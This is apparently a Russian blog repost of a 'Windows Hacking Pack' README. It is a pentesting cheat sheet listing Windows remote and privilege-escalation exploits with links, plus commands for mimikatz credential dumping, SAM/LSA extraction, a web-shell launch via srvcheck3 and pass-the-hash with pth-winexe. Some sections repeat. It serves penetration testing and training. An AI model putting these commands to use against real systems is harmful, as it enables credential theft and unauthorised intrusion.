WHP – пакет взлома Microsoft Windows |

WHP – пакет взлома Microsoft Windows

Обзоры
 M$ Windows Hacking Pack
===========

Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may be not (eg. sysinternals).
"pes" means "PE Scambled". It's useful sometimes.

Remote Exploits
===========

Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp

Windows XP/NT (beofre SP2)
MS03-026  Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit

Windows XP (SP2 and SP3) (can be used also for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit (srvscv)
https://www.exploit-db.com/exploits/7104/

Windows Windows 7 and Server 2008 R2 (x64) All Service Packs
MS17-010 aka "Eternal Blue"
https://github.com/RiskSense-Ops/MS17-010

Windows Server 2016 (DoS, may lead to exec)
"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8

Privilege Escalation
===========

First, if you have meterpreter, it may be a good idea to try "getsystem".

srvcheck3.exe
=====
Privilege escalation for Windows XP SP2 and before
This can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"

KiTrap0D.tar
=====
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/

Other ways of exploits listed
=====
Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/

Windows Vista/7
CVE: 2010-4398  Elevation of Privileges (UAC Bypass)
http://www.securityfocus.com/bid/45045/exploit

Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/

Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/

Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
Hot Potato – Windows Privilege Escalation

Windows 10 (and before)
Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM

Windows XP SP2 (and before)
srvcheck3.exe - upnp service or SSDPSRV service

Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/

Windows Vista/7
CVE: 2010-4398  Elevation of Privileges (UAC Bypass)
http://www.securityfocus.com/bid/45045/exploit

Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/

Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com

Windows NT/2K/XP/2K3/Vista/2K8/7/8
KiTrap0D - EPATHOBJ Local Ring Exploit
https://www.exploit-db.com/exploits/11199/

Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
Hot Potato – Windows Privilege Escalation

Windows XP (and after)
.lnk exploit for receiving NetNTLM hashes remotely.


Backup files if contain sam
Windows/system32/config/SAM
/WINDOWS/repair/SAM
regedit.exe HKEY_LOCAL_MACHINE -> SAM

Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel
Otherwise just copy.

Dump SAM through shadow volume
If it can be created the database could be copied from this.
Vista command: vssadmin create shadow
Server 2008 command: diskshadow

Windows Credentials Editor
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).

Mimikatz dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials
fgdump.exe (contains pwdump and cachedump, can read from memory)

SAM dump (hive)
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."

Dump SAM, then spray hashes
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/

LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip

PassTheHash (before Windows 8.1)
pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmd

PassTheTicket (Kerberos)
mimikatz can do it

Duplicate Access Tokens (if admin access token can be used, it's win)
http://sourceforge.net/projects/incognito/

Token "Kidnapping"
MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority)
http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html

Other notablelo tools
psexec, smbshell, metasploit’s psexec, etc
https://github.com/BloodHoundAD/BloodHound - It allows to visualize connections in an AD domain and find fast escalation ways.

To Be Added
===========
- http://www.nirsoft.net/ --> Stuff for dumping passwords
- openvpn
- evilgrade

Hashes (SHA256) and VirusTotal scans
===========

8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333  AwesomerShell.tar
7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051  KiTrap0D.tar
96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389  LICENSE.t

 

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий